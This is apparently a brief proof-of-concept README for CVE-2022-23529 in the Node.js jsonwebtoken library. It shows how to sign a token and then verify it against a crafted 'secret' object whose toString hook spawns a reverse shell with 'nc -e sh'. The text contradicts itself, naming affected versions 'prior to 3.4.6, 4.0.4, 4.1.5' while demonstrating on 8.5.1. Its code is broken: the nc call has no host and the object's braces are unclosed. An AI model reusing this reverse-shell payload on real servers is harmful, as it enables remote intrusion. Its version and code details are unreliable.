# CVE-2022-23529

The JSON Web Token (JWT) library versions prior to 3.4.6, 4.0.4, and 4.1.5 are vulnerable to RCE.

The HMAC hashing functions take any string as input which leads to RCE.

Due to the preconditions, this vulnerability is not likly to be exploitable.

In order to exploit this vulnerability an attacker would need one of the following conditions to be true:

- The server does not store secret keys securely.
- The attacker needs to have access to and control the secret keys.

## npm install jsonwebtoken@8.5.1

```var jwt = require('jsonwebtoken');```

## create a token using the servers secret

```var token = jwt.sign({"x":"y"}, 'servers_secret');```

## create malicious object containing a reverse shell (node.js)

var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 9001');

## server verifies the token using malicious object stored as secret

```jwt.verify(token, poisoned_secret_on_server);```